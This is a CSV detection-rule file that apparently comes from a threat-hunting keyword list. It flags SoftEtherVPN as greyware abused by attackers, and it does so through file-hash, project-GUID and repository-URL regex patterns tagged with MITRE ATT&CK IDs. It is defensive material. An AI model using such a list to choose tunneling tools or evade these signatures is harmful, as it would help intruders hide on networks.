"*498244e2fa32092cfd4b6f2d0b62a8f963724738cd01ed9f623369ff55a309f8*",".{0,1000}498244e2fa32092cfd4b6f2d0b62a8f963724738cd01ed9f623369ff55a309f8.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*4f42773bb9fa283dc34d4c54347b197b95176024cf3fc6c1e11932f2a56188da*",".{0,1000}4f42773bb9fa283dc34d4c54347b197b95176024cf3fc6c1e11932f2a56188da.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*507a32af5f58e47f635053b3ff0605db2e819cd63d31709e40cb1d98364b015b*",".{0,1000}507a32af5f58e47f635053b3ff0605db2e819cd63d31709e40cb1d98364b015b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*51a6e79cd5c7e100116719a73c4f005f8b5dc59027adfe75e77d154af938d698*",".{0,1000}51a6e79cd5c7e100116719a73c4f005f8b5dc59027adfe75e77d154af938d698.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*55af645a3111f2f9ecf35df965f709378a72e216d1963c134cade7391c24f563*",".{0,1000}55af645a3111f2f9ecf35df965f709378a72e216d1963c134cade7391c24f563.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*56930110ad5e21a3b7c69008bdb3efd368c0ebafc1d0d97b48a76a3563ec8e24*",".{0,1000}56930110ad5e21a3b7c69008bdb3efd368c0ebafc1d0d97b48a76a3563ec8e24.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*57f265c72747a75c914118d2f69550b534d661f49bf8684c81f7ef75c952f97a*",".{0,1000}57f265c72747a75c914118d2f69550b534d661f49bf8684c81f7ef75c952f97a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*5ba980906682ff6eb47a50cb6208901518e62d013ff46075e96a919331dc23b4*",".{0,1000}5ba980906682ff6eb47a50cb6208901518e62d013ff46075e96a919331dc23b4.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*5f2cab7fc38140b2cc11a54ab687ab4fb8966ca4965822b8c85025d45a47c0fd*",".{0,1000}5f2cab7fc38140b2cc11a54ab687ab4fb8966ca4965822b8c85025d45a47c0fd.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*60e0928a261b230fb6fffc711348a4acc1a73a00d95a0060eecd96e9c7c16a82*",".{0,1000}60e0928a261b230fb6fffc711348a4acc1a73a00d95a0060eecd96e9c7c16a82.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*61dc49f7c5b09a72e96329e43bb3a896c428da449bb67c7803d21eaabd7591b6*",".{0,1000}61dc49f7c5b09a72e96329e43bb3a896c428da449bb67c7803d21eaabd7591b6.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*626d14d508afc1bcbed6e013d531d64a1c5fac529790857ad2730f6ca864aece*",".{0,1000}626d14d508afc1bcbed6e013d531d64a1c5fac529790857ad2730f6ca864aece.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*6440ef1a2fab83dfb27e976067134eb5767fbdcf20e7ad73f217b37ce3014eed*",".{0,1000}6440ef1a2fab83dfb27e976067134eb5767fbdcf20e7ad73f217b37ce3014eed.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*6f486fb6576a30179b3ef6bf36ad0bec39745f22d504209abd602338c77707b9*",".{0,1000}6f486fb6576a30179b3ef6bf36ad0bec39745f22d504209abd602338c77707b9.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*701b8a45901f7dc715140662e68f7d7e8c59f631866f9ac862896cd06a2d5865*",".{0,1000}701b8a45901f7dc715140662e68f7d7e8c59f631866f9ac862896cd06a2d5865.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*744a0029e2e666d09e3fad6304782ceb12997dbaf2b9288caaf8485c80ddf949*",".{0,1000}744a0029e2e666d09e3fad6304782ceb12997dbaf2b9288caaf8485c80ddf949.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*7459f321ec957d160f95ccf5fccc46be6f2c26bd78f0bcdf03d53ae131d051f5*",".{0,1000}7459f321ec957d160f95ccf5fccc46be6f2c26bd78f0bcdf03d53ae131d051f5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*78a34aed87a873fb155ca34ec30ec520bf64f34fbe4452be2ba3a8a928a28e30*",".{0,1000}78a34aed87a873fb155ca34ec30ec520bf64f34fbe4452be2ba3a8a928a28e30.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*7b3ed9e4b5430bbfbb619e7367e05319fc41102dba1dd2103a25f37d66dcd1b0*",".{0,1000}7b3ed9e4b5430bbfbb619e7367e05319fc41102dba1dd2103a25f37d66dcd1b0.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*7be4b33d5f554546778d2f4b35cab35ea4157cad14b68cbc730bf4279fe3d3fb*",".{0,1000}7be4b33d5f554546778d2f4b35cab35ea4157cad14b68cbc730bf4279fe3d3fb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*7c437d4d02d7e2a936b4c1ff7bc8f5abbf16786746deffa92d5f5f2fd7ba04fb*",".{0,1000}7c437d4d02d7e2a936b4c1ff7bc8f5abbf16786746deffa92d5f5f2fd7ba04fb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*7e2641906f4beeaf11dff6c4aefc9be37bae9a314ce2357dd88b804387ecd096*",".{0,1000}7e2641906f4beeaf11dff6c4aefc9be37bae9a314ce2357dd88b804387ecd096.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*81CA3EC4-026E-4D37-9889-828186BBB8C0*",".{0,1000}81CA3EC4\-026E\-4D37\-9889\-828186BBB8C0.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#GUIDproject","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*820d4bccb36fefaa8b77fed456872ddd63a433fa5ce3dd024ccf3f9c93710c30*",".{0,1000}820d4bccb36fefaa8b77fed456872ddd63a433fa5ce3dd024ccf3f9c93710c30.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*87d7db96fb7c8fd8668f69717d84c9cc36f3c2ae96a8ef2187fb4b3544fabf5d*",".{0,1000}87d7db96fb7c8fd8668f69717d84c9cc36f3c2ae96a8ef2187fb4b3544fabf5d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*9135fc8890e155d1a3dac0907b5081e171cbbfddb6e19e238741d719c951d2ef*",".{0,1000}9135fc8890e155d1a3dac0907b5081e171cbbfddb6e19e238741d719c951d2ef.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*93050aec30d7f0268e4fa3ac695a1131f838fe19a625bf574c322c1914b76c93*",".{0,1000}93050aec30d7f0268e4fa3ac695a1131f838fe19a625bf574c322c1914b76c93.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*9aa8a85153861516996a7c38d282bce08be9fb8d1d5ea707173fc6d43c5c8e8a*",".{0,1000}9aa8a85153861516996a7c38d282bce08be9fb8d1d5ea707173fc6d43c5c8e8a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*9b8973d38cfee2c1e90385a1d25741dd4d9a72f426252719ac46bc8b89975618*",".{0,1000}9b8973d38cfee2c1e90385a1d25741dd4d9a72f426252719ac46bc8b89975618.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*a54e83a923cedcae9c948e438cc3213c49e2c207f3914fdb5254d213d62604eb*",".{0,1000}a54e83a923cedcae9c948e438cc3213c49e2c207f3914fdb5254d213d62604eb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*a58286cef52371c6103a194d90224cd693e69b544e06fa40784de35af6277512*",".{0,1000}a58286cef52371c6103a194d90224cd693e69b544e06fa40784de35af6277512.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*ab5ec32d639fa8346bf81b3c610f87a14977c7f7151b869214f43904d96915ca*",".{0,1000}ab5ec32d639fa8346bf81b3c610f87a14977c7f7151b869214f43904d96915ca.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*af75ab9765d7f9003aeffef2587615a1f57ed9b6f1bbe44830592b444da8f295*",".{0,1000}af75ab9765d7f9003aeffef2587615a1f57ed9b6f1bbe44830592b444da8f295.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*b2fbf30e0db9dd21a011d733f210f9c7944f4cdf3903c352946c3f88e760746d*",".{0,1000}b2fbf30e0db9dd21a011d733f210f9c7944f4cdf3903c352946c3f88e760746d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*b4c16d2e012d0c946e0826ab7e34acc035eca9d1a94a5fd30f394124296c962b*",".{0,1000}b4c16d2e012d0c946e0826ab7e34acc035eca9d1a94a5fd30f394124296c962b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*b5649a8ea3cc6477325e09e2248ef708d434ee3b2251eb8764bcfc15fb1de456*",".{0,1000}b5649a8ea3cc6477325e09e2248ef708d434ee3b2251eb8764bcfc15fb1de456.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*b884750041a05d7998e07110ba366d19af3c35157c95524b240707f81ce9572c*",".{0,1000}b884750041a05d7998e07110ba366d19af3c35157c95524b240707f81ce9572c.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*BA902FC8-E936-44AA-9C88-57D358BBB700*",".{0,1000}BA902FC8\-E936\-44AA\-9C88\-57D358BBB700.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#GUIDproject","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*bca2f7b65962dc1ef67996d9c853158b9beb3c73755fda6c217dd2883b9ab29d*",".{0,1000}bca2f7b65962dc1ef67996d9c853158b9beb3c73755fda6c217dd2883b9ab29d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*c3b6f554126e1bc5dee6dff6d0b8dcd7241abbccff9898be3224ff90912c6c4c*",".{0,1000}c3b6f554126e1bc5dee6dff6d0b8dcd7241abbccff9898be3224ff90912c6c4c.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*c4dc53f4912605a25c18357b0a0bf6dc059286ca901cb981abdf1a22d1649ddc*",".{0,1000}c4dc53f4912605a25c18357b0a0bf6dc059286ca901cb981abdf1a22d1649ddc.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*c7647cb1c2631105bb032dad94057bfa62970d70dfa48f8be0c1a4160ff7c56d*",".{0,1000}c7647cb1c2631105bb032dad94057bfa62970d70dfa48f8be0c1a4160ff7c56d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*c99142c5e55fae055955332964c56d29aba10bec9764ab961aebabf6c3ee1462*",".{0,1000}c99142c5e55fae055955332964c56d29aba10bec9764ab961aebabf6c3ee1462.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*ca32067f8f93d2cc0aa1ead819aa8db3e6803c1e535e377598548f41c34ccac4*",".{0,1000}ca32067f8f93d2cc0aa1ead819aa8db3e6803c1e535e377598548f41c34ccac4.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*ca5ae82e1e5269bc00b2539f84d0c5d258601741c905b7fe02ff6bd6e06089c1*",".{0,1000}ca5ae82e1e5269bc00b2539f84d0c5d258601741c905b7fe02ff6bd6e06089c1.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*cb36d409779d4a7b0285552c3bc41efc576b4a22ca5fea6f4c288e1e96f7f4eb*",".{0,1000}cb36d409779d4a7b0285552c3bc41efc576b4a22ca5fea6f4c288e1e96f7f4eb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*cbf8cb94407c028df22b4b16607adf543aa3087f079c4d7906bbb1d9081b7179*",".{0,1000}cbf8cb94407c028df22b4b16607adf543aa3087f079c4d7906bbb1d9081b7179.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*ccef810ad3e3d55975e4acaf210e75ee63fa5de1069c8c4ab1579765d541170b*",".{0,1000}ccef810ad3e3d55975e4acaf210e75ee63fa5de1069c8c4ab1579765d541170b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*cf194caf93ce5a46768876b5fee0f644f6878e0a4dea0e391bf4ea1689731cb5*",".{0,1000}cf194caf93ce5a46768876b5fee0f644f6878e0a4dea0e391bf4ea1689731cb5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*code.onedev.io/SoftEther/VPN.git*",".{0,1000}code\.onedev\.io\/SoftEther\/VPN\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*d075c00b275c76255d94d50dcff34b3e8238783c137551d3eeee8351eaaf2361*",".{0,1000}d075c00b275c76255d94d50dcff34b3e8238783c137551d3eeee8351eaaf2361.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
